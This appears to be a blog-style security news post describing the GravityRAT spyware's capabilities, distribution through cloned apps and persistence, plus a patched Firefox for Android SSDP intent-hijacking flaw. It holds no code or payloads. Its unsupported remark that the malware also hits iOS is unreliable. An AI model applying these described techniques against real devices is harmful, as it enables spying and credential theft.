Gravity RAT , affects mobile devices

GravityRAT is a malware strain known for checking the CPU temperature of Windows computers to avoid being executed in sandboxes and virtual machines.

The GravityRAT malware Access Trojan (RAT) is believed to be the work of Pakistani hacker groups, it is under development at least since 2015.

The malware researchers found the new Android GravityRAT sample in 2019.The hackers had added a spy module to Travel Mate, an Android app for travelers to India, the source code of which is available on Github.

The tainted app is able to steal contacts, emails, and documents from the infected device, then send them back to the command-and-control server.The C&C server was also associated with other two malicious apps targeting the Windows and macOS platforms.

The spyware is able to get information about the system and support multiple features, including:

  • search for files on the computer and removable disks with the extensions .doc, .docx, .ppt, .pptx, .xls, .xlsx, .pdf, .odt, .odp, and .ods, and upload them to the server
  • get a list of running processes
  • intercept keystrokes
  • take screenshots
  • execute arbitrary shell commands
  • scan ports

The malware was distributed via applications that clone legitimate apps that act as downloader for the GravityRAT payloads.

The applications analyzed by Kaspersky were developed in .NET, Python and Electron framework, they achieve persistence by adding a scheduled task.

Threat actors tricked the victims into installing a malicious app disguised as a secure messenger in order to continue the conversation an proceed to contaminate.

What peculiar about this Gravity RAT , not only infects Windows, now with Android , IOS devices too

Hijacking Firefox

The SSDP engine of the victims’ Firefox browsers can be tricked into triggering an Android intent by simply replacing location of the XML file in the response packets with a specially crafted message pointing to an Android intent URI.

For this, an attacker connected to a targeted Wi-Fi network can run a malicious SSDP server on his/her device and trigger intent-based commands on nearby Android devices through Firefox—without requiring any interaction from the victims.

Activities allowed by the intent also includes automatically launching the browser and open any defined URL, which, according to the researchers, is sufficient to trick victims into providing their credentials, install malicious apps, and other malicious activities based on the surrounding scenarios.

“The target simply has to have the Firefox application running on their phone. They do not need to access any malicious websites or click any malicious links. No attacker-in-the-middle or malicious app installation is required. They can simply be sipping coffee while on a cafe’s Wi-Fi, and their device will start launching application URIs under the attacker’s control,” Moberly said.

“it could have been used in a way similar to phishing attacks where a malicious site is forced onto the target without their knowledge in the hopes they would enter some sensitive info or agree to install a malicious application.”

Moberly reported this vulnerability to the Firefox team a few weeks back, which the browser maker has now patched in the Firefox for Android versions 80 and later.